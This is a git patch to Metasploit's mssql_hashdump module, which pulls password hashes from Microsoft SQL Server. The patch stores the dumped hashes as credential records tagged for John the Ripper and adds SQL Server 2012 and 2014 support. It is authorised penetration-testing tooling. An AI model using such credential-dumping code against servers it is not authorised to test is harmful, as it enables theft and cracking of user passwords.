From d3949b3d6c0fd762fccdda0e012291bc6ba9c9be Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 3 Jun 2014 15:02:59 -0500 Subject: [PATCH] refactor mssql_hashdump refactor mssql_hashdump to use Metasploit:Credential --- Gemfile | 2 +- Gemfile.lock | 6 +-- .../auxiliary/scanner/mssql/mssql_hashdump.rb | 41 +++++++++++++++---- 3 files changed, 38 insertions(+), 11 deletions(-) diff --git a/Gemfile b/Gemfile index 353a73cc3e..df1610bca5 100755 --- a/Gemfile +++ b/Gemfile @@ -27,7 +27,7 @@ group :db do # Needed for Msf::DbManager gem 'activerecord', '>= 3.0.0', '< 4.0.0' # Metasploit::Creential database models - gem 'metasploit-credential', git: 'github-metasploit-credential:rapid7/metasploit-credential.git', tag: 'v0.1.8-metasploit-credential' + gem 'metasploit-credential', git: 'github-metasploit-credential:rapid7/metasploit-credential.git', tag: 'v0.1.10-metasploit-credential' # Database models shared between framework and Pro. gem 'metasploit_data_models', '~> 0.17.1' # Needed for module caching in Mdm::ModuleDetails diff --git a/Gemfile.lock b/Gemfile.lock index c70fc9b031..ddd48121ea 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,9 +1,9 @@ GIT remote: github-metasploit-credential:rapid7/metasploit-credential.git - revision: 2be17e6327b4a5caa9a22ffc0b064923a25a222c - tag: v0.1.8-metasploit-credential + revision: 728ab82ab069edb21815fa944c1b8224b0511376 + tag: v0.1.10-metasploit-credential specs: - metasploit-credential (0.1.8.pre.electro.pre.release) + metasploit-credential (0.1.10.pre.electro.pre.release) metasploit-concern (~> 0.0.4) metasploit_data_models (~> 0.17.0) rubyntlm diff --git a/modules/auxiliary/scanner/mssql/mssql_hashdump.rb b/modules/auxiliary/scanner/mssql/mssql_hashdump.rb index a31c2637c6..91a5ecf793 100644 --- a/modules/auxiliary/scanner/mssql/mssql_hashdump.rb +++ b/modules/auxiliary/scanner/mssql/mssql_hashdump.rb @@ -55,10 +55,10 @@ class Metasploit3 < Msf::Auxiliary case version_year when "2000" - hashtype = "mssql.hashes" + hashtype = "mssql" - when "2005", "2008" - hashtype = "mssql05.hashes" + when "2005", "2008", "2012", "2014" + hashtype = "mssql05" end this_service = report_service( @@ -74,15 +74,42 @@ class Metasploit3 < Msf::Auxiliary 'Columns' => ['Username', 'Hash'] ) - hash_loot="" + service_data = { + address: ::Rex::Socket.getaddress(rhost,true), + port: rport, + service_name: 'mssql', + protocol: 'tcp', + workspace_id: myworkspace_id + } + mssql_hashes.each do |row| next if row[0].nil? or row[1].nil? next if row[0].empty? or row[1].empty? + + credential_data = { + module_fullname: self.fullname, + origin_type: :service, + private_type: :nonreplayable_hash, + private_data: row[1], + username: row[0], + jtr_format: hashtype + } + + credential_data.merge!(service_data) + + credential_core = create_credential(credential_data) + + login_data = { + core: credential_core, + status: Metasploit::Credential::Login::Status::UNTRIED + } + + login_data.merge!(service_data) + login = create_credential_login(login_data) + tbl << [row[0], row[1]] print_good("#{rhost}:#{rport} - Saving #{hashtype} = #{row[0]}:#{row[1]}") end - filename= "#{datastore['RHOST']}-#{datastore['RPORT']}_sqlhashes.txt" - store_loot(hashtype, "text/plain", datastore['RHOST'], tbl.to_csv, filename, "MS SQL Hashes", this_service) end #Grabs the user tables depending on what Version of MSSQL @@ -99,7 +126,7 @@ class Metasploit3 < Msf::Auxiliary when "2000" results = mssql_query(mssql_2k_password_hashes())[:rows] - when "2005", "2008" + when "2005", "2008", "2012", "2014" results = mssql_query(mssql_2k5_password_hashes())[:rows] end